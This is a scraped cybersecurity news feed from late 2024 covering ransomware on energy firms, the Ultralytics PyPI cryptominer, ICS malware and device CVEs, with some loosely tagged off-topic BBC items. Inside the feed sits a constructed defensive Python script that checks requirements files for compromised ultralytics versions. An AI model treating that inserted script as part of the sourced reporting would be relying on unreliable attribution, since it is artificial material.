    industry ciber
    2024-12-20 https://www.helpnetsecurity.com/2024/12/20/anjos-nijk-encs-energy-grid-cybersecurity/

    In this Help Net Security interview, Anjos Nijk, Managing Director of the European Network for Cyber security (ENCS), discusses cybersecurity in the energy sector as it modernizes with renewable sources and smart grid technologies. Nijk also addresses the need for international collaboration, the impact of IoT on security, and the emerging technologies that can enhance the resilience and reliability of critical energy infrastructure. As the energy sector undergoes significant modernization, particularly with the integration of … More

    "

    Autosummary: So, we need to implement technology to maintain control, but also need to create the conditions for residential users, operators and integrators to securely install, operate and maintain their infrastructure. However, connected infrastructures, such as renewables and EV charging networks, fall outside the direct control of grid operators, and can also cause blackouts in the grid. "


    Ransomware in 2024: New players, bigger payouts, and smarter tactics

    exploits industry
    2024-12-19 https://www.helpnetsecurity.com/2024/12/19/ransomware-surveys-2024/

    In 2024, ransomware remained the top cybersecurity threat to organizations worldwide. New groups filled the void left by law enforcement crackdowns, targeting businesses with record-breaking ransom demands and sophisticated tactics. In this article, you will find excerpts from ransomware surveys we covered in 2024 that will help your organization improve cybersecurity strategies. VPN vulnerabilities, weak credentials fuel ransomware attacks Following law enforcement’s takedown of LockBit in Q1, RansomHub, which emerged in February 2024, quickly filled the void, … More

    "

    Autosummary: During the second quarter, new ransomware groups, including PLAY, Medusa, RansomHub, INC Ransom, BlackSuit, and some additional lesser-known factions, led a series of attacks that eclipsed the first quarter of this year by 16% and the second quarter of 2023 by 8%. The findings from the report uncovered a record-breaking ransom payment of $75 million to the Dark Angels ransomware group, which is nearly double the highest publicly known ransomware payout, and an overall 18% increase in ransomware attacks year-over-year. As for whether organizations are paying the ransom, respondents were split: 34% pay every time, 21% pay only some of the time, and 45% never pay. "


    Critics "continue to try to cancel me" - Vinicius Jr

    industry
    2024-12-18 https://www.bbc.com/sport/football/articles/cwy4e7d7wllo
    Real Madrid forward Vinicius Jr says his critics "continue to try to cancel me, to belittle me" after earning one of football's biggest individual honours. "

    Autosummary: "


    Iran-Linked IOCONTROL Malware Targets SCADA and Linux-Based IoT Platforms

    exploits industry Linux
    2024-12-13 https://thehackernews.com/2024/12/iran-linked-iocontrol-malware-targets.html
    Iran-affiliated threat actors have been linked to a new custom malware that's geared toward IoT and operational technology (OT) environments in Israel and the United States. The malware has been codenamed IOCONTROL by OT cybersecurity company Claroty, highlighting its ability to attack IoT and supervisory control and data acquisition (SCADA) devices such as IP cameras, routers, programmable "

    Autosummary: The development makes IOCONTROL the tenth malware family to specifically single out Industrial Control Systems (ICS) after Stuxnet, Havex, Industroyer (aka CrashOverride), Triton (aka Trisis), BlackEnergy2, Industroyer2, PIPEDREAM (aka INCONTROLLER), COSMICENERGY, and FrostyGoop (aka BUSTLEBERM) to date. "


    Cato Networks extends SASE-based protection to IoT/OT environments

    industry
    2024-12-11 https://www.helpnetsecurity.com/2024/12/11/cato-iot-ot-security/

    With the introduction of Cato IoT/OT Security, Cato Networks is enabling enterprises to simplify the management and security of Internet of Things (IoT) and operational technology (OT) devices. Cato IoT/OT Security converges device discovery and classification, policy enforcement, and threat prevention in a SASE platform. Cato IoT/OT Security is a native feature in the Cato SASE Cloud Platform, which allows enterprises to instantly activate the new solution with a click of a button. There is … More

    "

    Autosummary: Additionally, IoT devices are often less secure by design, while OT systems in critical infrastructure are generally challenging to patch,” said John Grady, principal analyst, network security and web application security at ESG. Enterprises require an IoT/OT security solution that provides discovery, visibility, policy enforcement, and threat prevention for IoT/OT devices. "


    Researchers Uncover Espionage Tactics of China-Based APT Groups in Southeast Asia

    industry
    2024-12-11 https://thehackernews.com/2024/12/researchers-uncover-espionage-tactics.html
    A suspected China-based threat actor has been linked to a series of cyber attacks targeting high-profile organizations in Southeast Asia since at least October 2023. The espionage campaign targeted organizations in various sectors spanning government ministries in two different countries, an air traffic control organization, a telecoms company, and a media outlet, the Symantec Threat Hunter Team "

    Autosummary: The attacks, which leveraged tools previously identified as linked to China-based advanced persistent threat (APT) groups, are characterized by the use of both open-source and living-off-the-land (LotL) techniques. "


    Lynx ransomware behind Electrica energy supplier cyberattack

    exploits ransomware industry ciber
    2024-12-11 https://www.bleepingcomputer.com/news/security/lynx-ransomware-behind-electrica-energy-supplier-cyberattack/
    ​The Romanian National Cybersecurity Directorate (DNSC) says the Lynx ransomware gang breached Electrica Group, one of the largest electricity suppliers in the country. [...] "

    Autosummary: INC vs Lynx ransomware string comparison (BleepingComputer). Since it emerged as a ransomware-as-a-service (RaaS) operation in July 2023, INC Ransom has also breached many education, healthcare, government, and industrial entities, including Yamaha Motor Philippines, Scotland's National Health Service (NHS), and the U.S. division of Xerox Business Solutions (XBS). "


    Romanian energy supplier Electrica Group is facing a ransomware attack

    exploits ransomware industry
    2024-12-10 https://securityaffairs.com/171832/hacking/electrica-group-ransomware-attack.html
    Romanian energy supplier Electrica Group is investigating an ongoing ransomware attack impacting its operations. The company assured investors that the attack hadn’t affected its critical systems, but temporary disruptions in customer services might occur due to enhanced security protocols. These measures […] "

    Autosummary: “The teams of specialists are working closely with the national cybersecurity authorities to manage and resolve the incident, aiming to address the situation as quickly as possible, identify the source of the attack, and limit its impact.” reads the note. (Pierluigi Paganini, December 10, 2024.) "


    Hit by blackouts Cuba’s tourism industry now braces for Trump

    industry
    2024-12-09 https://www.bbc.com/news/articles/cly7ndxjzv2o
    Cuba's hotels, already hit by power cuts, worry that Trump may increase the US's economic blockade. "

    Autosummary: Photo (Getty Images): Canadian tourists, such as these taking part in an exercise class, are vital to the Cuban tourism sector. With winter nights drawing in across North America, Canadian “snowbirds” – citizens who flee their freezing temperatures for sunnier climes every year – are planning their annual trips to Florida or the Caribbean. “The Ministry of Tourism has been preparing for the winter season to deliver better services, uninterrupted supplies, a better airport experience, and more and new car rentals.” "


    Romanian energy supplier Electrica hit by ransomware attack

    exploits ransomware industry
    2024-12-09 https://www.bleepingcomputer.com/news/security/romanian-energy-supplier-electrica-hit-by-ransomware-attack/
    Electrica Group, a key player in the Romanian electricity distribution and supply market, is investigating a ransomware attack that was still "in progress" earlier today. [...] "

    Autosummary: "


    Ultralytics AI Library Compromised: Cryptocurrency Miner Found in PyPI Versions

    industry
    2024-12-07 https://thehackernews.com/2024/12/ultralytics-ai-library-compromised.html
    In yet another software supply chain attack, it has come to light that two versions of a popular Python artificial intelligence (AI) library named ultralytics were compromised to deliver a cryptocurrency miner. The versions, 8.3.41 and 8.3.42, have since been removed from the Python Package Index (PyPI) repository. A subsequently released version has introduced a security fix that "ensures "

    Autosummary: "


    Ultralytics AI model hijacked to infect thousands with cryptominer

    industry
    2024-12-06 https://www.bleepingcomputer.com/news/security/ultralytics-ai-model-hijacked-to-infect-thousands-with-cryptominer/
    The popular Ultralytics YOLO11 AI model was compromised in a supply chain attack to deploy cryptominers on devices running versions 8.3.41 and 8.3.42 from the Python Package Index (PyPI) [...] "

    Autosummary: Comment by Glenn Jocher on GitHub (source: BleepingComputer). The developers are currently investigating the root cause, and potential vulnerabilities in the Ultralytics build environment to determine how it was breached. "
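As an added example (not code from the articles or from the Ultralytics project), the check below audits a requirements file for the three conditions that let a poisoned release through: an exact pin to one of the two versions the articles name as compromised, a version range that a resolver may satisfy with whatever is newest on the index, or an exact pin with no `--hash` so the downloaded artifact is never compared against what was reviewed. The requirements text and the sha256 digest are constructed placeholders, and the known-bad list is hard-coded here only for illustration.

```python
import re

# Assumption for illustration: the two ultralytics releases the articles name as
# compromised. A real check would take this list from an advisory feed.
KNOWN_BAD_VERSIONS = {"ultralytics": {"8.3.41", "8.3.42"}}

# Package name, optional operator, optional version; the version stops at
# whitespace, ';' (environment marker) or '#' (comment).
REQ_RE = re.compile(r"^([A-Za-z0-9][A-Za-z0-9._-]*)\s*(==|~=|>=|<=|!=|>|<)?\s*([^\s;#]*)")

# Constructed requirements file (not from any real project); the digest is a placeholder.
SAMPLE_REQUIREMENTS = "\n".join([
    "# lock file excerpt",
    "ultralytics==8.3.41",
    "numpy>=1.26",
    "requests==2.32.3 --hash=sha256:" + "0" * 64,
    "--index-url https://pypi.org/simple",
])


def normalize(name):
    """PEP 503 name normalisation so Ultralytics, ultralytics and ultra_lytics compare equal."""
    return re.sub(r"[-_.]+", "-", name).lower()


def audit_requirements(text, known_bad=KNOWN_BAD_VERSIONS):
    """Return (line_no, package, problem) for every line that would let a
    compromised release in: a pin to a known-bad version, a range the resolver
    may satisfy with a newer release, or a pin with no --hash."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("-"):  # blank, comment-only, or a pip option line
            continue
        m = REQ_RE.match(line)
        if not m:
            continue
        name, op, version = normalize(m.group(1)), m.group(2), m.group(3)
        if op != "==":
            findings.append((line_no, name, "not pinned with ==; resolver may pick a newer release"))
        elif version in known_bad.get(name, set()):
            findings.append((line_no, name, f"pinned to known-compromised version {version}"))
        elif "--hash=" not in line:
            findings.append((line_no, name, "pinned without --hash; artifact integrity not verified"))
    return findings


if __name__ == "__main__":
    for finding in audit_requirements(SAMPLE_REQUIREMENTS):
        print(finding)
```

The parser handles one requirement per line; lock files that continue `--hash` arguments onto following lines with a trailing backslash need those lines joined before the audit.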


    US government, energy sector contractor hit by ransomware

    exploits government ransomware industry
    2024-12-03 https://www.helpnetsecurity.com/2024/12/03/englobal-ransomware-attack/

    ENGlobal, a Texas-based engineering and automation contractor for companies in the energy sector, has had its data encrypted by attackers. “On November 25, 2024, ENGlobal Corporation (the “Company”) became aware of a cybersecurity incident. The preliminary investigation has revealed that a threat actor illegally accessed the Company’s information technology (“IT”) system and encrypted some of its data files,” the company shared in an 8-K filed on Monday with the US Securities and Exchange Commission. The … More

    "

    Autosummary: "


    Energy industry contractor ENGlobal Corporation discloses a ransomware attack

    exploits ransomware industry
    2024-12-03 https://securityaffairs.com/171617/cyber-crime/englobal-corporation-disclosed-a-ransomware-attack.html
    ENGlobal Corporation disclosed a ransomware attack, discovered on November 25, disrupting operations, in a filing to the SEC. A ransomware attack disrupted the operations of a major energy industry contractor, ENGlobal Corporation. Founded in 1985, ENGlobal Corporation designs automated control systems for commercial and government sectors, reporting $6 million in Q3 revenue and $18.4 million […] "

    Autosummary: (Pierluigi Paganini, December 03, 2024.) ENGlobal Corporation disclosed a ransomware attack, discovered on November 25, disrupting operations, in a filing to the SEC. "


    SmokeLoader Malware Resurfaces, Targeting Manufacturing and IT in Taiwan

    exploits industry
    2024-12-02 https://thehackernews.com/2024/12/smokeloader-malware-resurfaces.html
    Taiwanese entities in manufacturing, healthcare, and information technology sectors have become the target of a new campaign distributing the SmokeLoader malware. "SmokeLoader is well-known for its versatility and advanced evasion techniques, and its modular design allows it to perform a wide range of attacks," Fortinet FortiGuard Labs said in a report shared with The Hacker News. "While "

    Autosummary: The malware supports several plugins that can steal login and FTP credentials, email addresses, cookies, and other information from web browsers, Outlook, Thunderbird, FileZilla, and WinSCP. "


    Trump threatens 100% tariff on Brics nations if they try to replace dollar

    industry
    2024-12-01 https://www.bbc.com/news/articles/cgrwj0p2dd9o
    The president-elect warned the group of nine nations against moving away from the dollar. "

    Autosummary: Major world powers China and Russia are part of the Brics alliance, along with Brazil, India, South Africa, Iran, Egypt, Ethiopia and the United Arab Emirates. "


    Over Two Dozen Flaws Identified in Advantech Industrial Wi-Fi Access Points – Patch ASAP

    industry
    2024-11-28 https://thehackernews.com/2024/11/over-two-dozen-flaws-identified-in.html
    Nearly two dozen security vulnerabilities have been disclosed in Advantech EKI industrial-grade wireless access point devices, some of which could be weaponized to bypass authentication and execute code with elevated privileges. "These vulnerabilities pose significant risks, allowing unauthenticated remote code execution with root privileges, thereby fully compromising the confidentiality, "

    Autosummary: "


    Matrix Botnet Exploits IoT Devices in Widespread DDoS Botnet Campaign

    exploits industry
    2024-11-27 https://thehackernews.com/2024/11/matrix-botnet-exploits-iot-devices-in.html
    A threat actor named Matrix has been linked to a widespread distributed denial-of-service (DDoS) campaign that leverages vulnerabilities and misconfigurations in Internet of Things (IoT) devices to co-opt them into a disruptive botnet. "This operation serves as a comprehensive one-stop shop for scanning, exploiting vulnerabilities, deploying malware, and setting up shop kits, showcasing a "

    Autosummary: "This operation serves as a comprehensive one-stop shop for scanning, exploiting vulnerabilities, deploying malware, and setting up shop kits, showcasing a do-it-all-yourself approach to cyberattacks," Assaf Morag, director of threat intelligence at cloud security firm Aqua, said. "


    Over 145,000 Industrial Control Systems Across 175 Countries Found Exposed Online

    industry
    2024-11-21 https://thehackernews.com/2024/11/over-145000-industrial-control-systems.html
    New research has uncovered more than 145,000 internet-exposed Industrial Control Systems (ICS) across 175 countries, with the U.S. alone accounting for over one-third of the total exposures. The analysis, which comes from attack surface management company Censys, found that 38% of the devices are located in North America, 35.4% in Europe, 22.9% in Asia, 1.7% in Oceania, 1.2% in South America, "

    Autosummary: The countries with the most ICS service exposures include the U.S. (more than 48,000), Turkey, South Korea, Italy, Canada, Spain, China, Germany, France, the U.K., Japan, Sweden, Taiwan, Poland, and Lithuania. The majority of exposed HMIs are located in the U.S., followed by Germany, Canada, France, Austria, Italy, the U.K., Australia, Spain, and Poland. "


    Ngioweb Botnet Fuels NSOCKS Residential Proxy Network Exploiting IoT Devices

    exploits industry
    2024-11-19 https://thehackernews.com/2024/11/ngioweb-botnet-fuels-nsocks-residential.html
    The malware known as Ngioweb has been used to fuel a notorious residential proxy service called NSOCKS, as well as by other services such as VN5Socks and Shopsocks5, new findings from Lumen Technologies reveal. "At least 80% of NSOCKS bots in our telemetry originate from the Ngioweb botnet, mainly utilizing small office/home office (SOHO) routers and IoT devices," the Black Lotus Labs team at "

    Autosummary: A breakdown of the residential proxy provider's proxies by device type shows that the botnet operators have targeted a broad spectrum of vendors, including NETGEAR, Uniview, Reolink, Zyxel, Comtrend, SmartRG, Linear Emerge, Hikvision, and NUUO. "


    Argentina orders arrests of pro-Bolsonaro rioters

    latam industry
    2024-11-16 https://www.bbc.com/news/articles/c3demgg542do
    Many Bolsonaro supporters are believed to have fled to Argentina following prosecutions for the Brasilia riots. "

    Autosummary: Scores of Bolsonaro supporters are believed to have fled to Argentina following prosecutions for the January 2023 riots. But others fled to Argentina to escape their sentences - particularly after far-right politician Javier Milei was elected president in December 2023. "


    "Amazing showcase" for UK gaming industry cancelled

    industry
    2024-11-15 https://www.bbc.com/news/articles/c5yxvxzp909o
    The organisers blamed "increasing costs and less demand" as the sector continues to struggle. "

    Autosummary: "


    Google Cloud Cybersecurity Forecast 2025: AI, geopolitics, and cybercrime take centre stage

    industry ciber
    2024-11-14 https://www.helpnetsecurity.com/2024/11/14/google-cybersecurity-forecast-2025/

    Google Cloud unveiled its Cybersecurity Forecast for 2025, offering a detailed analysis of the emerging threat landscape and key security trends that organizations worldwide should prepare for. The report delivers insights into the tactics of cyber adversaries, providing advice for increasing security posture in the coming year. The year of AI-driven cyberattacks The report highlights a shift in the cybersecurity landscape: the rise of artificial intelligence (AI) as a double-edged sword. While AI offers new … More

    "

    Autosummary: Key recommendations: Prioritize cloud security: Organisations should embrace cloud-native security solutions, such as cloud-based SIEM and SOAR platforms, to improve visibility, threat detection, and incident response capabilities. “2025 is going to be the year when AI moves from pilots and prototypes into large-scale adoption,” Phil Venables, VP, TI Security & CISO, Google Cloud, added. "


    OvrC Platform Vulnerabilities Expose IoT Devices to Remote Attacks and Code Execution

    industry
    2024-11-13 https://thehackernews.com/2024/11/ovrc-platform-vulnerabilities-expose.html
    A security analysis of the OvrC cloud platform has uncovered 10 vulnerabilities that could be chained to allow potential attackers to execute code remotely on connected devices. "Attackers successfully exploiting these vulnerabilities can access, control, and disrupt devices supported by OvrC; some of those include smart electrical power supplies, cameras, routers, home automation systems, and "

    Autosummary: The most severe of the flaws are listed below: CVE-2023-28649 (CVSS v4 score: 9.2), which allows an attacker to impersonate a hub and hijack a device; CVE-2023-31241 (CVSS v4 score: 9.2), which allows an attacker to claim arbitrary unclaimed devices by bypassing the requirement for a serial number; CVE-2023-28386 (CVSS v4 score: 9.2), which allows an attacker to upload arbitrary firmware updates resulting in code execution; CVE-2024-50381 (CVSS v4 score: 9.1), which allows an attacker to impersonate a hub and unclaim devices arbitrarily and subsequently exploit other flaws to claim it. "With more devices coming online every day and cloud management becoming the dominant means of configuring and accessing services, more than ever, the impetus is on manufacturers and cloud service providers to secure these devices and connections," Katz said. "


    An energy efficient home - is it worth the cost?

    industry
    2024-11-12 https://www.bbc.com/news/articles/cqxwjwqw3xdo
    It can be hard to find good advice on how to make homes more energy efficient. "

    Autosummary: “We can model all the different options that are available, suitable for your home and your budget, and identify a package of measures,” says Liz Lainé, of Parity Projects, a housing data analysis company, which runs Ecofurb. Improving the energy efficiency of homes is “essential” for decarbonisation, says Gerald Charles, head of housing retrofit at the Centre for Sustainable Energy, but he adds that the current lack of good advice remains a genuine problem. Perseverance during the past three years paid off, however, and the couple’s 1930’s detached house now has improved insulation, a heat pump, and an electric car charging point. "


    5 Ways Behavioral Analytics is Revolutionizing Incident Response

    industry
    2024-11-12 https://thehackernews.com/2024/11/5-ways-behavioral-analytics-is.html
    Behavioral analytics, long associated with threat detection (i.e. UEBA or UBA), is experiencing a renaissance. Once primarily used to identify suspicious activity, it’s now being reimagined as a powerful post-detection technology that enhances incident response processes. By leveraging behavioral insights during alert triage and investigation, SOCs can transform their workflows to become more "

    Autosummary: For example, an "impossible travel" alert, which often creates false positives, flags logins from locations that are humanly impossible to reach in a short time (e.g., a New York login followed by one in Singapore five minutes later). By shifting from a front-line detection tool to a post-detection powerhouse, behavioral analytics provides the context needed to distinguish real threats from noise, avoid end-user disruptions, and accelerate response times. Traditional workflows often involve repetitive, manual tasks for each alert, such as digging into historical data, verifying normal patterns, or communicating with end-users. "


    AndroxGh0st Malware Integrates Mozi Botnet to Target IoT and Cloud Services

    exploits industry
    2024-11-08 https://thehackernews.com/2024/11/androxgh0st-malware-integrates-mozi.html
    The threat actors behind the AndroxGh0st malware are now exploiting a broader set of security flaws impacting various internet-facing applications, while also deploying the Mozi botnet malware. "This botnet utilizes remote code execution and credential-stealing methods to maintain persistent access, leveraging unpatched vulnerabilities to infiltrate critical infrastructures," CloudSEK said in a "

    Autosummary: Oracle E-Business Suite (EBS) unauthenticated arbitrary file upload vulnerability; CVE-2023-1389 (CVSS score: 8.8) - TP-Link Archer AX21 firmware command injection vulnerability; CVE-2024-4577 (CVSS score: 9.8) - PHP CGI argument injection vulnerability; CVE-2024-36401 (CVSS score: 9.8) - GeoServer remote code execution vulnerability. "The botnet cycles through common administrative usernames and uses a consistent password pattern," the company said. "


    iPhones in a law enforcement forensics lab mysteriously rebooted losing their After First Unlock (AFU) state

    government industry
    2024-11-08 https://securityaffairs.com/170683/mobile-2/iphones-in-law-enforcement-forensics-lab-mysteriously-rebooted.html
    Law enforcement warns that securely stored iPhones awaiting forensic examination are mysteriously rebooting, making them much harder to unlock, per a document obtained by 404 Media. 404 Media obtained the document from a mobile […] "

    Autosummary: iPhones in a law enforcement forensics lab mysteriously rebooted losing their After First Unlock (AFU) state Pierluigi Paganini November 08, 2024 Law enforcement warns that securely stored iPhones awaiting forensic examination are mysteriously rebooting, making them harder to unlock, reported 404 Media. "


    Critical vulnerability in Cisco industrial wireless access points fixed (CVE-2024-20418)

    exploits industry
    2024-11-07 https://www.helpnetsecurity.com/2024/11/07/cve-2024-20418/

    Cisco has fixed a critical command injection vulnerability (CVE-2024-20418) affecting its Ultra-Reliable Wireless Backhaul (URWB) Access Points that can be exploited via HTTP requests and allows complete compromise of the devices. There are no workarounds to address this flaw, though vulnerable access points can be protected by switching off URWB mode, the company shared in the advisory. The good news is that the vulnerability was discovered by a Cisco employee during internal security testing … More

    The post Critical vulnerability in Cisco industrial wireless access points fixed (CVE-2024-20418) appeared first on Help Net Security.

    "

    Autosummary: "


    Cisco Releases Patch for Critical URWB Vulnerability in Industrial Wireless Systems

    exploits industry
    2024-11-07 https://thehackernews.com/2024/11/cisco-releases-patch-for-critical-urwb.html
    Cisco has released security updates to address a maximum severity security flaw impacting Ultra-Reliable Wireless Backhaul (URWB) Access Points that could permit unauthenticated, remote attackers to run commands with elevated privileges. Tracked as CVE-2024-20418 (CVSS score: 10.0), the vulnerability has been described as stemming from a lack of input validation to the web-based management "

    Autosummary: "


    Industrial companies in Europe targeted with GuLoader

    industry
    2024-11-07 https://www.helpnetsecurity.com/2024/11/07/industrial-europe-spear-phishing-guloader/

    A recent spear-phishing campaign targeting industrial and engineering companies in Europe was aimed at saddling victims with the popular GuLoader downloader and, ultimately, a remote access trojan that would permit attackers to steal information from and access compromised computers whenever they wish. “The emails are sent from various email addresses including from fake companies and compromised accounts. The emails typically hijack an existing email thread or request information about an order,” Tara Gould, Threat Research … More

    The post Industrial companies in Europe targeted with GuLoader appeared first on Help Net Security.

    "

    Autosummary: This allows malicious code to be run through a legitimate process, meaning security products may not detect the malware, or victims may not be alerted since the process will look like a normal Windows process,” Gould told Help Net Security. "


    North Korean hackers employ new tactics to compromise crypto-related businesses

    industry
    2024-11-07 https://www.helpnetsecurity.com/2024/11/07/north-korean-crypto-related-phishing/

    North Korean hackers are targeting crypto-related businesses with phishing emails and novel macOS-specific malware. The crypto-related phishing campaign Since July 2024, phishing emails seemingly containing helpful information on risks related to the rise of the price of Bitcoin have been sent to intended victims in cryptocurrency-related industries, SentinelLabs researchers have found. The phishing email (Source: SentinelLabs) The email urges the recipient to click on the “Open” button to download a PDF file, but doing that … More

    The post North Korean hackers employ new tactics to compromise crypto-related businesses appeared first on Help Net Security.

    "

    Autosummary: “We might speculate that heightened attention on previous [Democratic People’s Republic of Korea] campaigns could have reduced the effectiveness of previous ‘social media grooming’ attempts, perhaps as a result of intended targets in DeFi, ETF and other crypto-related industries becoming more wary, but it is equally likely that such state-backed threat actors have sufficient resources to pursue multiple strategies simultaneously,” the researchers noted. In the case of this malware, the commands launch the backdoor written to disk earlier by the stage-one dropper,” Stokes told Help Net Security, and added that if the backdoor has been removed, the persistence mechanism will not be able to reinstall it. "


    Symbiotic provides developers with real-time feedback on potential security vulnerabilities

    industry
    2024-11-06 https://www.helpnetsecurity.com/2024/11/06/symbiotic-security-real-time-feedback/

    Symbiotic Security launched a real-time security for software development that combines detection and remediation with just-in-time training – incorporating security testing and training directly into the development process without breaking developers’ workflows. Backed with $3 million of seed funding from investors including Lerer Hippeau, Axeleo Capital, Factorial Capital, and others, the company has introduced its software-as-a-service that works with the developer’s Integrated Development Environment (IDE) and enables them to develop software more securely. A Ponemon … More

    The post Symbiotic provides developers with real-time feedback on potential security vulnerabilities appeared first on Help Net Security.

    "

    Autosummary: “Traditional approaches to code security are broken, which we fix by integrating security at the time code is written,” said Jerome Robert, CEO, Symbiotic Security. "


    U.S. CISA adds PTZOptics camera bugs to its Known Exploited Vulnerabilities catalog

    exploits industry
    2024-11-05 https://securityaffairs.com/170595/security/u-s-cisa-adds-ptzoptics-camera-bugs-to-its-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds PTZOptics PT30X-SDI/NDI camera bugs to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: Threat actors are attempting to exploit the two zero-day vulnerabilities CVE-2024-8956 and CVE-2024-8957 in PTZOptics pan-tilt-zoom (PTZ) live streaming cameras, GreyNoise researchers warned last week. GreyNoise […] "

    Autosummary: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: CVE-2024-8957 PTZOptics PT30X-SDI/NDI Cameras OS Command Injection Vulnerability; CVE-2024-8956 PTZOptics PT30X-SDI/NDI Cameras Authentication Bypass Vulnerability. Threat actors are attempting to exploit the two zero-day vulnerabilities CVE-2024-8956 and CVE-2024-8957 in PTZOptics pan-tilt-zoom (PTZ) live streaming cameras, GreyNoise researchers warned last week. "


    Cyber Threats That Could Impact the Retail Industry This Holiday Season (and What to Do About It)

    industry
    2024-11-04 https://thehackernews.com/2024/11/cyber-threats-that-could-impact-retail.html
    As the holiday season approaches, retail businesses are gearing up for their annual surge in online (and in-store) traffic. Unfortunately, this increase in activity also attracts cybercriminals looking to exploit vulnerabilities for their gain.  Imperva, a Thales company, recently published its annual holiday shopping cybersecurity guide. Data from the Imperva Threat Research team’s "

    Autosummary: Key steps include evaluating traffic risks, identifying entry points, blocking outdated user agents, limiting proxies, implementing rate limiting, and monitoring for signs of automation or headless browsers. DDoS Attacks Remain a Persistent Threat Distributed Denial-of-Service (DDoS) attacks are nearly as common as business logic abuse, representing 30.6% of AI-driven threats to retailers — and they are becoming progressively more prominent. The financial impact of a successful DDoS attack can be staggering, with businesses facing revenue loss, increased recovery costs, and potential long-term damage to their brand reputation. "


    PTZOptics cameras zero-days actively exploited in the wild

    exploits industry
    2024-11-02 https://securityaffairs.com/170456/hacking/ptzoptics-cameras-flaws-exploited.html
    Hackers are exploiting two zero-day vulnerabilities, tracked as CVE-2024-8956 and CVE-2024-8957, in PTZOptics cameras. Threat actors are attempting to exploit two zero-day vulnerabilities, tracked as CVE-2024-8956 and CVE-2024-8957, in PTZOptics pan-tilt-zoom (PTZ) live streaming cameras, GreyNoise researchers warn. GreyNoise discovered the two flaws while investigating the use of an exploit detected by its LLM-powered threat-hunting tool Sift. The company discovered […] "

    Autosummary: PTZOptics cameras zero-days actively exploited in the wild Pierluigi Paganini November 02, 2024 Hackers are exploiting two zero-day vulnerabilities, tracked as CVE-2024-8956 and CVE-2024-8957, in PTZOptics cameras. "


    Threat actors are stepping up their tactics to bypass email protections

    industry
    2024-11-01 https://www.helpnetsecurity.com/2024/11/01/cybercriminals-emails-protections-video/

    Although most organizations use emails with built-in security features that filter out suspicious messages, criminals always find a way to bypass these systems. With the development of AI technology, phishing is becoming increasingly difficult to recognize, allowing them to circumvent security measures. While most attempts do not succeed, it only takes one to cause significant damage to a company’s operations. Mick Leach, Field CISO at Abnormal Security, discusses why the automotive industry is the new … More

    The post Threat actors are stepping up their tactics to bypass email protections appeared first on Help Net Security.

    "

    Autosummary: "


    Stop LUCR-3 Attacks: Learn Key Identity Security Tactics in This Expert Webinar

    industry
    2024-11-01 https://thehackernews.com/2024/11/stop-lucr-3-attacks-learn-key-identity.html
    Did you know that advanced threat actors can infiltrate the identity systems of major organizations and extract sensitive data within days? It’s a chilling reality, becoming more common and concerning by the day. These attackers exploit vulnerabilities in SaaS and cloud environments, using compromised identities to move laterally within networks, causing widespread damage. Cybersecurity and IT "

    Autosummary: Gain practical strategies for identifying and responding to suspicious activity across identity providers, cloud platforms, and SaaS applications. "


    IoT needs more respect for its consumers, creations, and itself

    industry
    2024-10-31 https://www.helpnetsecurity.com/2024/10/31/connected-device-privacy/

    Yet again, connected devices are in the news for all the wrong reasons. In October, security researchers found that robot vacuums from Chinese company, Ecovacs, can be compromised via a backdoor. In one case, hackers gained control over the device and shouted slurs at the homeowners. Worse still: the company doesn’t take responsibility and tells users they “do not need to worry excessively” about the vulnerability. This hack is another unfortunate example of connected device … More

    The post IoT needs more respect for its consumers, creations, and itself appeared first on Help Net Security.

    "

    Autosummary: But the implications are far more sinister – these always-connected, sensor-equipped devices could be used to eavesdrop on private conversations, stalk targets, or even conduct corporate intelligence gathering by scanning homes for products and brands. And yet, despite multiple high-profile stories, poor products with lax security are concerningly common, a clear danger with cameras and microphones in the mix. The smart home and office are, in essence, our personal and professional lives, and I’m certainly not comfortable with companies playing fast and loose with cybersecurity standards. "


    Sophos mounted counter-offensive operation to foil Chinese attackers

    industry
    2024-10-31 https://www.helpnetsecurity.com/2024/10/31/sophos-china-defensive-operation/

    Sophos conducted a defensive and counter-offensive operation over the last five years against multiple interlinked nation-state adversaries based in China targeting perimeter devices, including Sophos Firewalls. Espionage campaigns tied to Chinese hacking groups The attackers used a series of campaigns with novel exploits and customized malware to embed tools to conduct surveillance, sabotage and cyberespionage as well as overlapping tactics, tools and procedures (TTPs) with well-known Chinese nation-state groups including Volt Typhoon, APT31 and APT41. The … More

    The post Sophos mounted counter-offensive operation to foil Chinese attackers appeared first on Help Net Security.

    "

    Autosummary: Minimize internet-facing services and devices when possible; prioritize patching with urgency for internet-facing devices and monitor these devices; enable hotfixes for edge devices to be allowed and applied automatically; collaborate with law enforcement, public-private partners, and government to share and act on relevant IoCs; create a plan for how your organization deals with EOL devices. “We need to work collaboratively across the public and private sector, law enforcement and governments, and the security industry, to share what we know about these adversarial operations. While they released details starting in 2020 on the campaigns associated, including Cloud Snooper and Asnarök, the company is sharing the overall investigation analysis to raise awareness of the persistence of Chinese nation-state adversaries and their hyperfocus to compromise perimeter, unpatched and end-of-life (EOL) devices, often via zero-day exploits they are creating for those devices. The adversaries targeted both small and large critical infrastructure and government targets, primarily located in South and South-East Asia, including nuclear energy suppliers, a national capital’s airport, a military hospital, state security apparatus, and central government ministries. "


    New LightSpy Spyware Version Targets iPhones with Increased Surveillance Tactics

    industry
    2024-10-31 https://thehackernews.com/2024/10/new-lightspy-spyware-version-targets.html
    Cybersecurity researchers have discovered an improved version of an Apple iOS spyware called LightSpy that not only expands on its functionality, but also incorporates destructive capabilities to prevent the compromised device from booting up. "While the iOS implant delivery method closely mirrors that of the macOS version, the post-exploitation and privilege escalation stages differ "

    Autosummary: " The plugins can capture a wide range of data, including Wi-Fi network information, screenshots, location, iCloud Keychain, sound recordings, photos, browser history, contacts, call history, and SMS messages, as well as gather information from apps like Files, LINE, Mail Master, Telegram, Tencent QQ, WeChat, and WhatsApp. "


    Fraudsters revive old tactics mixed with modern technology

    industry
    2024-10-28 https://www.helpnetsecurity.com/2024/10/28/payments-fraud-schemes/

